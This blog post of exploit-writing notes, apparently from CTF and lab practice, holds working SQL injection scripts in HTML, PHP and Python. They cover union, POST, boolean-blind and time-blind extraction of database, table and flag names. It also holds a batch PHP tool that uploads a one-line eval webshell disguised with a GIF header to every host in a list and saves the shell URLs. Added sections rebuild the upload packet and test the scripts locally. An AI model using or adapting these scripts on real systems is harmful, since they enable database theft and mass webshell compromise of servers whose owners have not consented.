[Writing Exploits] Writing simple injection exploits

Preface

Learning notes on writing simple exploit scripts.

1. Writing an injection exploit in plain HTML

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Simple HTML exploit</title>
</head>
<body>
<!-- Submitting the form makes the browser send GET /?id=<payload> to the target;
     the browser URL-encodes the hidden value (the quote, the # and the spaces) for us. -->
<form method="GET" action="http://ebc14e18-2cda-4cd7-b884-c4261c48768f.challenge.ctf.show:8080/">
<input type="hidden" name="id" value="1.1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())#"/>
<input type="submit" value="Exploit" />
</form>
</body>
</html>

Going one step further: let the user type in the target URL, then inject.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Simple HTML exploit</title>
<script>
function exploit() {
  // Take the URL typed by the user and use it as the form action
  var x = document.getElementById("url").value;
  var form = document.getElementById("myform");
  if (x) {
    form.action = x;
    form.submit();   // the browser sends GET <x>?id=<payload>
  } else {
    alert("Please enter the target URL!");
  }
}
</script>
</head>
<body>
<!-- The text box has no name attribute, so only "id" ends up in the query string -->
<form id="myform" method="GET">
<input type="text" id="url" size="50">
<input type="hidden" name="id" value="1.1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())#"/>
<input type="button" value="exploit" onclick="exploit()"/>
</form>
</body>
</html>

2. Writing an injection exploit in PHP

fsockopen() returns a file pointer that can be used with the other file functions (such as fgets(), fgetss(), fwrite(), fclose() and feof()). If the call fails it returns FALSE.

Here fsockopen() is used to hand-craft and send the raw HTTP request.

<?php
$site = "ebc14e18-2cda-4cd7-b884-c4261c48768f.challenge.ctf.show";
// The payload is already URL-encoded because it goes straight into the request line
$payload = "?id=1.1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23";

$fp = fsockopen($site, 8080, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    $out  = "GET /{$payload} HTTP/1.1\r\n";
    $out .= "Host: {$site}:8080\r\n";
    // "Connection: close" makes the server close the socket after the response;
    // with keep-alive the feof() loop below blocks until the server's idle timeout
    $out .= "Connection: close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>

Matching only the result you want

<?php
$site = "ebc14e18-2cda-4cd7-b884-c4261c48768f.challenge.ctf.show";
// Each table name is wrapped in ~ ~ markers so it can be picked out of the HTML with a regex
$payload = "?id=1.1%27%20union%20select%201,2,(select%20group_concat(%27~%27,table_name,%27~%27)%20from%20information_schema.tables%20where%20table_schema=database())%23";

$fp = fsockopen($site, 8080, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    $out  = "GET /{$payload} HTTP/1.1\r\n";
    $out .= "Host: {$site}:8080\r\n";
    $out .= "Connection: close\r\n\r\n";
    fwrite($fp, $out);
    // Read the whole response first: matching chunk by chunk (the first version of this
    // script only looked at response line 27) misses a marker pair split across two reads
    $html = "";
    while (!feof($fp)) {
        $html .= fgets($fp, 128);
    }
    fclose($fp);
    preg_match_all("/~(.*?)~/", $html, $hash);
    print_r($hash[1]);   // the captured table names
}
?>

3. Writing an injection exploit in Python

Using a regular expression

import requests
import re

# Fetch the page with the payload and pull the results out of the HTML

url = "http://81426808-4f66-48bf-84f4-327b8ba4b8c2.challenge.ctf.show:8080/"

def get_result(url):
    # Already URL-encoded, so it is passed as a raw query string rather than a dict
    payload = "id=1.1%27%20union%20select%201,2,(select%20group_concat(%27~%27,table_name,%27~%27)%20from%20information_schema.tables%20where%20table_schema=database())%23"
    res = requests.get(url, params=payload)
    # Each table name was wrapped in ~ ~ by the payload, so the regex isolates them
    result = re.findall('~(.*?)~', res.text)
    return result

print('.'.join(get_result(url)))
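The PHP and Python scripts above both do the same two things: hand-build a GET request carrying the union payload, and fish the delimited values back out of whatever HTML the page wraps them in. The following is an added example, not code from the original post, that shows both steps end to end without touching the challenge host: it starts a hypothetical stand-in for the vulnerable page on localhost (it has no database; it only renders the columns a union payload asks for, using constructed table names), sends the request over a bare socket the way fsockopen() does, reads until the server closes the connection, and extracts the ~-delimited values. The server class, the port, the table names and the HTML layout are all assumptions made for the demonstration.

```python
import re
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Constructed data: the "tables" the fake page reports
FAKE_TABLES = ["flag", "users"]


class FakeVulnPage(BaseHTTPRequestHandler):
    """Hypothetical stand-in for the challenge page: no SQL is run, the handler just
    renders what group_concat('~', table_name, '~') would produce for the payload."""

    def do_GET(self):
        sql = parse_qs(urlparse(self.path).query).get("id", [""])[0]
        if "group_concat('~',table_name,'~')" in sql:
            col3 = ",".join("~%s~" % t for t in FAKE_TABLES)
        else:
            col3 = ",".join(FAKE_TABLES)
        body = ("<html><body><div>id: 1</div><div>name: 2</div>"
                "<div>email: %s</div></body></html>" % col3).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):  # keep the request log quiet
        pass


def start_fake_server():
    srv = HTTPServer(("127.0.0.1", 0), FakeVulnPage)  # port 0: any free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def raw_get(host, port, path_and_query):
    """Hand-built HTTP/1.1 GET over a plain socket, like fsockopen() + fwrite() in PHP.
    Returns (header block, body). Connection: close lets us read until EOF."""
    req = ("GET %s HTTP/1.1\r\nHost: %s:%d\r\nConnection: close\r\n\r\n"
           % (path_and_query, host, port)).encode()
    chunks = []
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(req)
        while True:
            data = s.recv(4096)
            if not data:          # server closed the connection: response complete
                break
            chunks.append(data)
    headers, _, body = b"".join(chunks).partition(b"\r\n\r\n")
    return headers.decode(), body.decode()


# Same pre-encoded payload as the scripts above
PAYLOAD = ("?id=1.1%27%20union%20select%201,2,(select%20group_concat(%27~%27,table_name,%27~%27)"
           "%20from%20information_schema.tables%20where%20table_schema=database())%23")


def extract_marked(html):
    """Return everything the payload wrapped in ~ ~, whatever HTML surrounds it."""
    return re.findall(r"~(.*?)~", html)


def run_union_exploit():
    """Start the fake page, fire the payload at it, return (status line, table names)."""
    srv = start_fake_server()
    try:
        host, port = srv.server_address
        headers, body = raw_get(host, port, "/" + PAYLOAD)
        return headers.split("\r\n")[0], extract_marked(body)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    status, tables = run_union_exploit()
    print(status)
    print(".".join(tables))
```

Reading until the peer closes is why the request carries Connection: close; with keep-alive the same read loop would sit on the socket until the server's idle timeout, which is exactly what happens to a feof() loop in PHP when that header is left on keep-alive.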

4. Writing a POST exploit

Python version

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/27
# blog: gylq.gitee.io

import requests
import re

# Send the payload in the POST body and pull the result out of the HTML
url = "http://inject2.lab.aqlab.cn:81/Pass-05/index.php"
payload = "' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 #"

def get_result(url):
    data = {
        'username': payload,   # requests form-encodes the values for us
        'password': '1'
    }
    res = requests.post(url, data=data)
    # The page echoes the second column between "Your Login" and "<br>Your Password"
    result = re.findall('Your Login(.*?)<br>Your Password', res.text)
    return result

print('.'.join(get_result(url)))

PHP version

<?php
/**
 * Send a POST request with curl
 * @param string $url
 * @param array $post_data
 */
$url = 'http://inject2.lab.aqlab.cn:81/Pass-05/index.php';
function request_post($url = '', $post_data = array()) {
    if (empty($url) || empty($post_data)) {
        return false;
    }
    // Build the application/x-www-form-urlencoded body by hand
    $o = "";
    foreach ($post_data as $k => $v) {
        $o .= "$k=" . urlencode($v) . "&";
    }
    $post_data = substr($o, 0, -1);
    $ch = curl_init();                              // initialise curl
    curl_setopt($ch, CURLOPT_URL, $url);            // target page
    curl_setopt($ch, CURLOPT_HEADER, 0);            // do not include the response headers
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);    // return the body as a string
    curl_setopt($ch, CURLOPT_POST, 1);              // use POST
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    $data = curl_exec($ch);                         // run the request
    curl_close($ch);

    return $data;
}
// "submit" is the raw button text; urlencode() above encodes it, so passing it
// pre-encoded (%E7%99%BB%E5%BD%95) would double-encode it
$post_data = array(
    "username" => "' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 #",
    "password" => "1",
    "submit"   => "登录"
);
$html = request_post($url, $post_data);
preg_match('/Your Login(.*?)Yo/', $html, $match);
echo $match[1];   // the captured group only
?>


6. Batch file upload getshell, PHP version

<?php

# Two command-line arguments are required: the URL list and the output file
if (count($argv) < 3) {
    print "\r\n\tUsage: " . $argv[0] . " url.txt save.txt\r\n";
    exit;
}

# Send a raw packet and return the whole response
function http_send($host, $packet) {
    #echo "\n\r\nRequest:\n".$packet;
    $sock = fsockopen($host, 8080);
    if (!$sock) {
        print "\n[-] No response from {$host}:8080 Trying again...";
        $sock = fsockopen($host, 8080);
        if (!$sock) {
            return "";
        }
    }
    fwrite($sock, $packet);
    // Accumulate the chunks; assigning each one would keep only the last 1024 bytes
    $resp = "";
    while (!feof($sock)) {
        $resp .= fread($sock, 1024);
    }
    fclose($sock);
    return $resp;
}

# Multipart upload request copied from a Burp capture
function data($host, $filename) {
    // In the body every boundary line is "--" followed by the boundary declared in Content-Type
    $payload  = "------WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n";
    $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
    $payload .= "Content-Type: image/png\r\n\r\n";
    // GIF89a header to pass an image-magic check, then the one-line webshell
    $payload .= 'GIF89a' . "\r\n" . '<?php eval($_REQUEST[shell])?>' . "\r\n\r\n";
    $payload .= "------WebKitFormBoundaryF1mJrJElc0yUu1HA--\r\n";
    $packet  = "POST /upload.php HTTP/1.1\r\n";
    $packet .= "Host: {$host}:8080\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n";
    $packet .= "Content-Length: " . strlen($payload) . "\r\n";
    $packet .= "Connection: close\r\n\r\n";   // lets the feof() loop in http_send() finish
    $packet .= $payload;

    return $packet;
}

# Upload to one host and return the "msg" values from the JSON reply (the saved path)
function exploit($host) {
    $filename = "b.php";
    $packet = data($host, $filename);
    $html = http_send($host, $packet);
    preg_match_all('/msg\":\"(.*?)\"/', $html, $match);
    return $match[1];   // captured group: the value of "msg"
}

# Append a line to the result file
function w($fileName, $data) {
    fwrite(fopen($fileName, "a+"), $data . "\r\n");
}

$url_txt = $argv[1];
$myurl = file($url_txt);
$save_file = $argv[2];

# Go through the host list
foreach ($myurl as $value) {
    #echo "Testing {$value}\r\n";
    // strip the scheme and any slashes so only the host remains
    $v = substr($value, strpos($value, "//") + 2);
    $v = trim(str_replace("/", "", $v));
    $msg = exploit($v);
    if (empty($msg)) {
        echo "\r\n[-] {$v}: no upload path in the response";
        continue;
    }
    $result = "http://{$v}:8080/" . trim($msg[0]);
    echo "\r\n" . $result;
    w($save_file, $result);
    sleep(1);
}

print "\r\n\r\n[+]-----------------------------WIN--------------------\r\n\r\n";
print "Save complete in {$save_file}\r\n\r\n";
?>
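The packet the batch script builds is the part most easily got wrong by hand: the boundary in the body must be the Content-Type boundary with two extra dashes, the closing line gets two more, and Content-Length has to be the length of the real body. The following added example (not from the original post) rebuilds that upload packet in Python with a per-request random boundary, then checks it with a minimal server-side multipart parser so that the body, the boundary and the length agree before anything is sent, and reads the saved path back out of the reply as JSON instead of with a regex. The reply shape {"msg": "<saved path>"} is an assumption taken from the regex in the batch script; the host, port and sample reply are constructed for the demonstration.

```python
import json
import os
import re

# Same webshell payload as the batch script: GIF header plus a one-line eval
WEBSHELL = b"GIF89a\r\n<?php eval($_REQUEST[shell])?>\r\n"


def build_upload_packet(host, port, filename, content, boundary=None):
    """Raw multipart/form-data POST for /upload.php. A random boundary is used when
    none is given; Content-Length is computed from the body actually sent."""
    if boundary is None:
        boundary = "----WebKitFormBoundary" + os.urandom(8).hex()
    body = (
        ("--%s\r\n" % boundary).encode()   # body delimiter = "--" + declared boundary
        + ('Content-Disposition: form-data; name="file"; filename="%s"\r\n' % filename).encode()
        + b"Content-Type: image/png\r\n\r\n"
        + content + b"\r\n"
        + ("--%s--\r\n" % boundary).encode()   # closing delimiter has two trailing dashes
    )
    head = (
        "POST /upload.php HTTP/1.1\r\n"
        "Host: %s:%d\r\n"
        "Content-Type: multipart/form-data; boundary=%s\r\n"
        "Content-Length: %d\r\n"
        "Connection: close\r\n\r\n" % (host, port, boundary, len(body))
    )
    return head.encode() + body


def parse_multipart(packet):
    """Minimal receiver-side parser, used to check the packet round-trips.
    Returns (filename, content_type, file_bytes) of the first file part."""
    headers, _, body = packet.partition(b"\r\n\r\n")
    boundary = re.search(rb"boundary=([^\r\n;]+)", headers).group(1)
    clen = int(re.search(rb"Content-Length: (\d+)", headers).group(1))
    if clen != len(body):
        raise ValueError("Content-Length %d does not match body length %d" % (clen, len(body)))
    parts = body.split(b"--" + boundary)
    # parts[0] is empty (body starts with a delimiter) and the last part is "--\r\n"
    for part in parts[1:-1]:
        part_headers, _, data = part.partition(b"\r\n\r\n")
        fn = re.search(rb'filename="([^"]*)"', part_headers).group(1).decode()
        ct = re.search(rb"Content-Type: ([^\r\n]+)", part_headers).group(1).decode()
        return fn, ct, data[:-2]   # drop the CRLF that precedes the next delimiter
    return None


def shell_url_from_response(host, port, response_body):
    """Turn the upload.php JSON reply into the webshell URL the batch script records.
    Assumption: a successful upload echoes the stored path in "msg"; anything that
    does not look like a PHP path (an error message, for instance) is treated as failure."""
    msg = json.loads(response_body).get("msg", "")
    if not msg.endswith(".php"):
        return None
    return "http://%s:%d/%s" % (host, port, msg.lstrip("/"))


if __name__ == "__main__":
    pkt = build_upload_packet("10.0.0.5", 8080, "b.php", WEBSHELL)
    print(pkt.decode())
    print(parse_multipart(pkt))
    # Constructed sample replies, one success and one rejection
    print(shell_url_from_response("10.0.0.5", 8080, '{"code":0,"msg":"upload/b.php"}'))
    print(shell_url_from_response("10.0.0.5", 8080, '{"code":1,"msg":"file type not allowed"}'))
```

A fixed boundary copied from Burp works, but a boundary that happens to occur inside the uploaded bytes corrupts the part, which is why browsers generate a fresh random one per request; the parser check is cheap insurance before pointing the script at a list of hosts.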

7. Boolean-based blind injection, Python version

Python version

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://www.moonteamweb.com/mysqlinj.php?id="
flag = ""
#*************************************************************************************************************************************************************
#-------- database names
sql = "select group_concat(schema_name) from information_schema.schemata"
#-------- tables
#sql = "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#-------- columns
#sql = "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagbab'"
#-------- flag
#sql = "select flag4sa from ctfshow.flagbab"
#*************************************************************************************************************************************************************
# The condition is true when the ASCII code of character i of the query result is greater than mid
payload = "1 and if(ascii(substr(({}),{},1))>'{}',1,0)"

for i in range(1, 100):
    # Binary search over the printable ASCII range 32..126
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        params = payload.format(sql, i, mid)
        res = requests.get(url + params)
        if "所谓SQL注入" in res.text:   # text the page only shows when the condition is true
            head = mid + 1
        else:
            tail = mid
    # Past the end of the result substr() is empty and ascii('') is 0, so the search bottoms out at 32
    if head != 32:
        print('[*] Extracted character {}'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

8. Time-based blind injection, Python version

Python version

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://www.web15.com/mysqlinj.php?id="
flag = ""
#*************************************************************************************************************************************************************
#-------- database names
sql = "select group_concat(schema_name) from information_schema.schemata"
#-------- tables
#sql = "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#-------- columns
#sql = "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagbab'"
#-------- flag
#sql = "select flag4sa from ctfshow.flagbab"
#*************************************************************************************************************************************************************
# The page looks the same either way; only the response time leaks the answer (sleep(1.5) when true)
payload = '1 or if(ascii(substr(({}),{},1))>"{}",sleep(1.5),1) '

for i in range(1, 100):
    # Binary search over the printable ASCII range 32..126
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        params = payload.format(sql, i, mid)
        start = time.time()
        res = requests.get(url + params)
        end = time.time()
        print(end - start)
        # Threshold just under the injected sleep; a slow link can still push a "false" response
        # over it, so raise the sleep value if the extracted text looks garbled
        if end - start > 1.4:
            head = mid + 1
        else:
            tail = mid
    # Past the end of the result ascii('') is 0, so the search bottoms out at 32
    if head != 32:
        print('[*] Extracted character {}'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

My personal blog

孤桜懶契: http://gylq.gitee.io

Title: [Writing Exploits] Writing simple injection exploits

Author: 孤桜懶契

Published: 2021-08-27 12:55:02

Last updated: 2021-10-20 13:29:32

Original link: https://gylq.gitee.io/posts/115.html

License: CC BY-NC-ND 4.0 International. Please keep the original link and author when reposting.
